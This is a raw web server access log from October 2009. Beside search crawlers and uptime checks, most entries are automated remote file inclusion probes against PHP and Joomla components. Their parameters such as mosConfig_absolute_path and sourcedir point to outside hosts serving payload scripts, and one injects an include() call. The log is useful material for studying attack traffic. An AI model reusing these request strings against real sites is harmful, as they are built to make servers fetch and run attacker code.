65.55.37.203 - - [17/Oct/2009:02:17:10 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.71.152 - - [17/Oct/2009:02:17:26 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L013063404FF92300A6A905H+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.66.83 - - [17/Oct/2009:02:17:46 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.55.37.203 - - [17/Oct/2009:02:18:34 -0400] "GET /logs/access_log.Q107073000 HTTP/1.1" 404 224 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.151.132.176 - - [17/Oct/2009:02:19:03 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:02:19:03 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:02:19:03 -0400] "GET /logs/access_log.Q109082500/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:02:19:03 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
220.181.7.71 - - [17/Oct/2009:02:19:27 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [17/Oct/2009:02:19:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.218.116.132 - - [17/Oct/2009:02:20:46 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
173.55.184.52 - - [17/Oct/2009:02:21:06 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://sn125w.snt125.mail.live.com/mail/InboxLight.aspx?FolderID=00000000-0000-0000-0000-000000000005&InboxSortAscending=False&InboxSortBy=Date&n=1423406470" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; yie8)"
82.151.132.176 - - [17/Oct/2009:02:21:36 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:02:21:36 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:02:21:36 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:02:23:05 -0400] "GET /logs/access_log.Q109082500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:02:23:05 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
65.55.106.159 - - [17/Oct/2009:02:23:21 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.65.65.67 - - [17/Oct/2009:02:23:26 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.65.65.67 - - [17/Oct/2009:02:23:26 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.65.65.67 - - [17/Oct/2009:02:23:27 -0400] "GET /logs/access_log.Q109080600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.65.65.67 - - [17/Oct/2009:02:23:42 -0400] "GET /logs/access_log.Q109070200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.64.75.54 - - [17/Oct/2009:02:23:49 -0400] "GET /logs/access_log.Q109080600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.64.75.54 - - [17/Oct/2009:02:23:49 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.64.75.54 - - [17/Oct/2009:02:23:50 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.64.75.54 - - [17/Oct/2009:02:24:13 -0400] "GET /logs/access_log.Q109070200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.55.106.159 - - [17/Oct/2009:02:24:13 -0400] "GET / HTTP/1.1" 200 409 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.3.133.37 - - [17/Oct/2009:02:24:27 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.3.133.37 - - [17/Oct/2009:02:24:27 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
72.3.133.37 - - [17/Oct/2009:02:24:27 -0400] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:02:24:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.3.133.37 - - [17/Oct/2009:02:24:34 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
72.29.70.51 - - [17/Oct/2009:02:25:09 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.29.70.51 - - [17/Oct/2009:02:25:09 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
72.29.70.51 - - [17/Oct/2009:02:25:09 -0400] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
72.29.70.51 - - [17/Oct/2009:02:25:16 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.71.152 - - [17/Oct/2009:02:25:26 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L013063404F79F300ACA905H+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.3.133.37 - - [17/Oct/2009:02:26:41 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.3.133.37 - - [17/Oct/2009:02:26:42 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.29.70.51 - - [17/Oct/2009:02:27:31 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.29.70.51 - - [17/Oct/2009:02:27:32 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
69.65.65.67 - - [17/Oct/2009:02:28:47 -0400] "GET /logs/access_log.Q109080600%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.65.65.67 - - [17/Oct/2009:02:28:59 -0400] "GET /logs/access_log.Q109070200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:02:29:07 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:02:29:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
98.149.124.8 - - [17/Oct/2009:02:30:14 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://mail.google.com/mail/?ui=2&view=bsp&ver=1qygpcgurkovy" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5"
61.100.181.217 - - [17/Oct/2009:02:30:45 -0400] "GET /write.php?write[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
61.100.181.217 - - [17/Oct/2009:02:30:45 -0400] "GET /logs/access_log.Q109072200/write.php?write[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.100.181.217 - - [17/Oct/2009:02:30:46 -0400] "GET /logs/write.php?write[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.249.71.152 - - [17/Oct/2009:02:30:54 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L017D57402F8955001888084+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.100.181.217 - - [17/Oct/2009:02:32:14 -0400] "GET /logs/access_log.Q109092000/write.php?write[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
98.208.102.56 - - [17/Oct/2009:02:32:53 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://mail.google.com/mail/?ui=2&view=bsp&ver=1qygpcgurkovy" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
69.64.75.54 - - [17/Oct/2009:02:34:14 -0400] "GET /logs/access_log.Q109080600%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.64.75.54 - - [17/Oct/2009:02:34:18 -0400] "GET /logs/access_log.Q109070200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:02:34:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.190.169.91 - - [17/Oct/2009:02:35:14 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
94.102.6.154 - - [17/Oct/2009:02:36:08 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:36:08 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:36:13 -0400] "GET /logs/access_log.Q109100200%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:36:16 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:36:16 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:02:36:22 -0400] "GET /logs/access_log.Q109100200%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:02:38:20 -0400] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://itnews.or.kr/data1/alat/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:02:38:20 -0400] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://itnews.or.kr/data1/alat/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:02:38:20 -0400] "GET /logs/access_log.Q109071700//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://itnews.or.kr/data1/alat/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:02:38:20 -0400] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://itnews.or.kr/data1/alat/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:02:38:20 -0400] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://itnews.or.kr/data1/alat/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:02:38:20 -0400] "GET /logs/access_log.Q109071700//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://itnews.or.kr/data1/alat/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:02:38:28 -0400] "GET /logs/access_log.Q109062100//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://itnews.or.kr/data1/alat/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:02:38:29 -0400] "GET /logs/access_log.Q109062100//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://itnews.or.kr/data1/alat/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:38:30 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:38:30 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:38:30 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:38:58 -0400] "GET /logs/access_log.Q109071100//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:39:25 -0400] "GET /logs/access_log.Q109080600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:39:28 -0400] "GET /logs/access_log.Q109051400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:02:39:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.27.203.107 - - [17/Oct/2009:02:39:53 -0400] "GET /logs/access_log.Q109062800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:02:40:32 -0400] "GET /logs/access_log.Q109071700%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://itnews.or.kr/data1/alat/id1.txt? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:02:40:32 -0400] "GET /logs/access_log.Q109062100%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://itnews.or.kr/data1/alat/id1.txt? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:02:40:33 -0400] "GET /logs/access_log.Q109071700%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://itnews.or.kr/data1/alat/id1.txt? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:02:40:33 -0400] "GET /logs/access_log.Q109062100%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://itnews.or.kr/data1/alat/id1.txt? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
208.42.184.11 - - [17/Oct/2009:02:41:11 -0400] "GET /images/monthly_specials.jpg HTTP/1.0" 200 73909 "-" "-"
91.76.145.185 - - [17/Oct/2009:02:43:24 -0400] "GET / HTTP/1.1" 200 409 "http://www.yandex.ru/yandsearch?stype=&nl=0&text=http%3A%2F%2Fwww.yandex.ru%2Fyandsearch%3Ftext%3Daceonlinestore.com" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9) Gecko Firefox/3.0"
218.27.203.107 - - [17/Oct/2009:02:43:37 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:44:01 -0400] "GET /logs/access_log.Q109071100%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:44:04 -0400] "GET /logs/access_log.Q109080600%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:44:16 -0400] "GET /logs/access_log.Q109051400%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:02:44:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.27.203.107 - - [17/Oct/2009:02:45:43 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:45:47 -0400] "GET /logs/access_log.Q109082200%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:45:53 -0400] "GET /logs/error_log.Q109051900%20%20/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:45:53 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:45:53 -0400] "GET /?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:45:53 -0400] "GET /?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:45:53 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:45:53 -0400] "GET /logs/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 22188 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:45:53 -0400] "GET /logs/?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 22188 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:46:13 -0400] "GET /logs/error_log.Q109051900%20%20/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:46:13 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:46:13 -0400] "GET /?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:46:13 -0400] "GET /logs/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 22188 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:46:14 -0400] "GET /?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:46:14 -0400] "GET /logs/?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 22188 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:46:15 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:46:39 -0400] "GET /?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:46:39 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:46:39 -0400] "GET /logs/?sourcedir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 22188 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:46:42 -0400] "GET /?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:46:42 -0400] "GET /logs/error_log.Q109051900/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:46:42 -0400] "GET /logs/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 22188 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:46:42 -0400] "GET /?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:46:42 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:46:42 -0400] "GET /logs/error_log.Q109051900/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:46:42 -0400] "GET /logs/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 22188 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:02:46:43 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:02:47:02 -0400] "GET /logs/access_log.Q109081500%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:47:05 -0400] "GET /?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:02:47:05 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
